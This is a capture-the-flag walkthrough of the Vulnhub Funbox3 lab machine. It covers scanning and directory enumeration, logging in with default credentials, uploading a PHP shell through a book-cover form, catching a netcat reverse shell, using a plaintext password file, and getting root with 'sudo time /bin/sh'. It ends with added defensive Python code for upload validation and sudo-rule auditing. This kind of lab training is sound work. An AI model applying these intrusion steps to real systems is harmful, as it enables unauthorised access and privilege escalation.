Funbox3
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:86:52:7b 1 60 PCS Systemtechnik GmbH
192.168.56.162 08:00:27:41:c1:af 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool that ships with Kali Linux, the target host's IP address was identified as 192.168.56.162.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.162 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-08 02:15 EST
Nmap scan report for bogon (192.168.56.162)
Host is up (0.00033s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b2:d8:51:6e:c5:84:05:19:08:eb:c8:58:27:13:13:2f (RSA)
| 256 b0:de:97:03:a7:2f:f4:e2:ab:4a:9c:d9:43:9b:8a:48 (ECDSA)
|_ 256 9d:0f:9a:26:38:4f:01:80:a7:a6:80:9d:d1:d4:cf:ec (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_gym
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:41:C1:AF (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.61 seconds
Get Access
Visiting port 80 in a browser from Kali Linux returns the Apache default page.
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ curl http://192.168.56.162/robots.txt
Disallow: gym
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ gobuster dir -u http://192.168.56.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.162
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/08 02:20:31 Starting gobuster in directory enumeration mode
===============================================================
/store (Status: 301) [Size: 316] [--> http://192.168.56.162/store/]
/admin (Status: 301) [Size: 316] [--> http://192.168.56.162/admin/]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.162/secret/]
/gym (Status: 301) [Size: 314] [--> http://192.168.56.162/gym/]
/server-status (Status: 403) [Size: 279]
Progress: 219643 / 220561 (99.58%)===============================================================
2022/11/08 02:21:04 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ gobuster dir -u http://192.168.56.162/gym -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.162/gym
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/08 02:21:49 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 318] [--> http://192.168.56.162/gym/img/]
/profile (Status: 301) [Size: 322] [--> http://192.168.56.162/gym/profile/]
/admin (Status: 301) [Size: 320] [--> http://192.168.56.162/gym/admin/]
/upload (Status: 301) [Size: 321] [--> http://192.168.56.162/gym/upload/]
/include (Status: 301) [Size: 322] [--> http://192.168.56.162/gym/include/]
/LICENSE (Status: 200) [Size: 18025]
/att (Status: 301) [Size: 318] [--> http://192.168.56.162/gym/att/]
/ex (Status: 301) [Size: 317] [--> http://192.168.56.162/gym/ex/]
/boot (Status: 301) [Size: 319] [--> http://192.168.56.162/gym/boot/]
Progress: 219077 / 220561 (99.33%)===============================================================
2022/11/08 02:22:20 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ dirb http://192.168.56.162
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Nov 8 02:28:34 2022
URL_BASE: http://192.168.56.162/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.162/ ----
==> DIRECTORY: http://192.168.56.162/admin/
+ http://192.168.56.162/index.html (CODE:200|SIZE:10918)
+ http://192.168.56.162/index.php (CODE:200|SIZE:3468)
+ http://192.168.56.162/robots.txt (CODE:200|SIZE:14)
==> DIRECTORY: http://192.168.56.162/secret/
+ http://192.168.56.162/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.162/store/
---- Entering directory: http://192.168.56.162/admin/ ----
==> DIRECTORY: http://192.168.56.162/admin/assets/
+ http://192.168.56.162/admin/index.php (CODE:200|SIZE:3263)
---- Entering directory: http://192.168.56.162/secret/ ----
+ http://192.168.56.162/secret/index.php (CODE:200|SIZE:108)
+ http://192.168.56.162/secret/robots.txt (CODE:200|SIZE:35)
---- Entering directory: http://192.168.56.162/store/ ----
+ http://192.168.56.162/store/admin.php (CODE:200|SIZE:3153)
==> DIRECTORY: http://192.168.56.162/store/controllers/
==> DIRECTORY: http://192.168.56.162/store/database/
==> DIRECTORY: http://192.168.56.162/store/functions/
+ http://192.168.56.162/store/index.php (CODE:200|SIZE:3998)
==> DIRECTORY: http://192.168.56.162/store/models/
==> DIRECTORY: http://192.168.56.162/store/template/
---- Entering directory: http://192.168.56.162/admin/assets/ ----
-----------------
END_TIME: Tue Nov 8 02:28:41 2022
DOWNLOADED: 18448 - FOUND: 9
The scans turned up a large number of directories; /store/database contains a username and password.
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ curl http://192.168.56.162/store/database/readme.txt.txt
This is an simple online web store was made by using php , mysql and bootstrap.
the sql for database is put in folder sql.
the database contains many tables.
To change the localhost, username, password for connecting to database, change it only one time in
www_project/functions/database_functions.php -> db_connect() . Simple and fast
The base is localhost , root , , www_project
to connect the admin section, click the name Nghi Le Thanh at the bottom.
the name and pass for log in is admin , admin. Just to make it simple.
the 2 main things are not fully implemented is contact and process purchase.
Due to having to work with some security and online payment, the process site is just a place holder.
for futher questions, please let me know. my email: nghi.lethanh2@cou.fi
Log in to /store/admin with the credentials found here: admin / admin.
The login succeeds; click "add new book".
Can’t add new data Incorrect integer value: ” for column ‘publisherid’ at row 1
Note the publisher field here: an existing Publisher can be copied into it.
After that, shell.php uploads successfully.
So where is shell.php stored? Pick any book, locate its cover image, and shell.php can be seen in the same directory:
http://192.168.56.162/store/bootstrap/img/
The shell came back successfully.
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.162] 42364
Linux funbox3 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
07:39:53 up 30 min, 0 users, load average: 0.00, 0.04, 0.17
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
cd /home
www-data@funbox3:/home$ ls -lah
ls -lah
total 12K
drwxr-xr-x 3 root root 4.0K Jul 30 2020 .
drwxr-xr-x 20 root root 4.0K Jul 30 2020 ..
drwxr-xr-x 3 tony tony 4.0K Jul 31 2020 tony
www-data@funbox3:/home$ cd tony
cd tony
www-data@funbox3:/home/tony$ ls -alh
ls -alh
total 36K
drwxr-xr-x 3 tony tony 4.0K Jul 31 2020 .
drwxr-xr-x 3 root root 4.0K Jul 30 2020 ..
-rw------- 1 tony tony 30 Jul 31 2020 .bash_history
-rw-r--r-- 1 tony tony 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 tony tony 3.7K Feb 25 2020 .bashrc
drwx------ 2 tony tony 4.0K Jul 30 2020 .cache
-rw-r--r-- 1 tony tony 807 Feb 25 2020 .profile
-rw-r--r-- 1 tony tony 0 Jul 30 2020 .sudo_as_admin_successful
-rw------- 1 tony tony 1.6K Jul 31 2020 .viminfo
-rw-rw-r-- 1 tony tony 70 Jul 31 2020 password.txt
www-data@funbox3:/home/tony$ cat passwod.txt
cat passwod.txt
cat: passwod.txt: No such file or directory
www-data@funbox3:/home/tony$ cat password.txt
cat password.txt
ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: admin@admin.com admin
www-data@funbox3:/home/tony$ su - tony
su - tony
Password: yxcvbnmYYY
tony@funbox3:~$ id
id
uid=1000(tony) gid=1000(tony) groups=1000(tony),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
tony@funbox3:~$ sudo -l
sudo -l
Matching Defaults entries for tony on funbox3:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tony may run the following commands on funbox3:
(root) NOPASSWD: /usr/bin/yelp
(root) NOPASSWD: /usr/bin/dmf
(root) NOPASSWD: /usr/bin/whois
(root) NOPASSWD: /usr/bin/rlogin
(root) NOPASSWD: /usr/bin/pkexec
(root) NOPASSWD: /usr/bin/mtr
(root) NOPASSWD: /usr/bin/finger
(root) NOPASSWD: /usr/bin/time
(root) NOPASSWD: /usr/bin/cancel
(root) NOPASSWD:
/root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh
tony@funbox3:~$
password.txt gives a very obvious hint: tony's password, which allows switching to user tony.
Privilege escalation
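The store accepted shell.php through its book-cover upload and then served it from a directory under the web root where PHP executes. As an added example (not the store's own code), the following Python validator shows the checks such an upload handler should make; the function names and the image-signature table are my own.

```python
import os
import secrets

# Allowed extensions and the magic bytes a genuine file of that type starts with.
IMAGE_SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

class UploadRejected(ValueError):
    """Raised when an upload must not be written to the image directory."""

def validate_image_upload(client_filename, data, max_bytes=2_000_000):
    """Check an uploaded cover image and return the random name to store it under."""
    if not data or len(data) > max_bytes:
        raise UploadRejected("empty or oversized upload")
    # Keep only the last path component of whatever name the client sent.
    base = os.path.basename(client_filename.replace("\\", "/"))
    parts = base.lower().split(".")
    # Exactly one extension: "shell.php.png" is rejected too, because Apache's
    # multiple-extension handling can still hand such a file to the PHP interpreter.
    if len(parts) != 2 or not parts[0]:
        raise UploadRejected("a single extension is required")
    ext = parts[1]
    if ext not in IMAGE_SIGNATURES:
        raise UploadRejected(f"extension .{ext} is not an allowed image type")
    # Check the content, not just the name: the bytes must match the claimed format.
    if not data.startswith(IMAGE_SIGNATURES[ext]):
        raise UploadRejected("file content does not match its extension")
    # Reject image/PHP polyglots: a valid image header with a script appended after it.
    if b"<?php" in data or b"<?=" in data:
        raise UploadRejected("script tag embedded in image data")
    # Never reuse the client-supplied name; the verified extension is the only part kept.
    return f"{secrets.token_hex(16)}.{ext}"

def is_accepted(client_filename, data):
    """True if the upload would be stored, False if validate_image_upload rejects it."""
    try:
        validate_image_upload(client_filename, data)
        return True
    except UploadRejected:
        return False
```

Store the returned name in a directory the web server serves without a script handler (or outside the document root), so that even a file that slips through the checks cannot be executed.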
tony@funbox3:~$ ls /root/root.txt
ls /root/root.txt
ls: cannot access '/root/root.txt': Permission denied
tony@funbox3:~$ sudo /usr/bin/time /bin/sh
sudo /usr/bin/time /bin/sh
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
root.flag snap
# cat root.flag
cat root.flag
__________ ___. ___________
\_ _____/_ __ ____\_ |__ _______ ___ /\ \_ _____/____ _________.__.
| __)| | \/ \| __ \ / _ \ \/ / \/ | __)_\__ \ / ___< | |
| \ | | / | \ \_\ ( <_> > < /\ | \/ __ \_\___ \ \___ |
\___ / |____/|___| /___ /\____/__/\_ \ \/ /_______ (____ /____ >/ ____|
\/ \/ \/ \/ \/ \/ \/ \/
Made with ❤ from twitter@0815R2d2. Please, share this on twitter if you want.
#
Privilege escalation is simple: referring to the GTFOBins site, the time command was chosen for the escalation.
Got the root flag!!!
Original article: http://www.cnblogs.com/jason-huawen/p/16870006.html
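As a defender's counterpart to the GTFOBins lookup, here is an added Python audit (not from the original page) that parses `sudo -l` output like tony's and flags the entries that deserve review. SHELL_ESCAPE_BINS is a hand-picked subset of GTFOBins, and the sample output is constructed from a subset of the entries shown above.

```python
import re
from collections import namedtuple

# Constructed sample: a subset of the `sudo -l` output shown on this page, including the
# entry whose command path wrapped onto the following line.
SAMPLE_SUDO_L = """\
User tony may run the following commands on funbox3:
    (root) NOPASSWD: /usr/bin/time
    (root) NOPASSWD: /usr/bin/pkexec
    (root) NOPASSWD: /usr/bin/whois
    (root) NOPASSWD:
        /root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh
"""
# Hand-picked subset of GTFOBins binaries that can hand back a shell or read files as root.
SHELL_ESCAPE_BINS = {"time", "pkexec", "mtr", "whois", "finger"}
STANDARD_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/local/bin/", "/usr/local/sbin/")
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.*)$")
SudoRule = namedtuple("SudoRule", "runas nopasswd command")

def parse_sudo_l(text):
    """Extract the command rules from `sudo -l` output, joining paths wrapped onto the next line."""
    lines = iter(text.splitlines())
    for line in lines:                            # skip everything up to the rule list
        if "may run the following commands" in line:
            break
    rules = []
    for line in lines:
        m = RULE_RE.match(line)
        if not m:
            continue
        cmd = m.group("cmd").strip() or next(lines, "").strip()   # path continued on next line
        rules.append(SudoRule(m.group("runas"), "NOPASSWD:" in m.group("tags"), cmd))
    return rules

def audit_rule(rule):
    """Return the reasons a rule deserves review (empty list means nothing was flagged)."""
    findings = []
    binary = rule.command.split()[0] if rule.command else ""
    name = binary.rsplit("/", 1)[-1]
    if rule.nopasswd:
        findings.append(f"NOPASSWD: runs as {rule.runas} without re-authentication")
    if name in SHELL_ESCAPE_BINS:
        findings.append(f"{name} is a known shell-escape binary")
    if binary and not binary.startswith(STANDARD_DIRS):
        findings.append(f"binary outside standard system directories: {binary}")
    if name.startswith("."):
        findings.append("hidden file used as a sudo target")
    return findings
```

Run it over `sudo -l -U <user>` output for each account in the sudo group; any rule with a non-empty findings list is one to justify or remove.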